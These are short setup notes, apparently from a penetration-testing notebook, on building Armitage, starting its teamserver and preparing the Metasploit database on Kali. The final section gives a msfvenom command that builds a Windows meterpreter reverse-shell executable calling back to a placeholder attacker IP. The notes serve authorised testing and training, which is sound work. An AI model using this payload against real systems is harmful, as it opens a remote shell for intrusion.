Armitage
Setup
git clone https://gitlab.com/kalilinux/packages/armitage.git && cd armitage
bash package.sh
cd ./release/unix/ && ls -la
in this folder there are two files to use
teamserver
ip address of the server
shared password to access the server
armitage
used to connect to the teamserver
upon executing the banary, a prompt will open to enter connection details
Preparing the environment
before launching armitage, there is a few checks to ensure metasploit is configured properly
systemctl start postgresql && systemctl status postgresql
msfdb --use-defaults delete
msfdb --use-defaults init
Starting and connecting to armitage
cd /opt/armitage/release/unix && ./teamserver YourIP P@ssw0rd123
cd /opt/armitage/release/unix && ./armitage
Generating a shell to get a call back
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ATTACKER_IP LPORT=31337 -f exe -o shell.exe
Lport is the port of the c2 listener
Last updated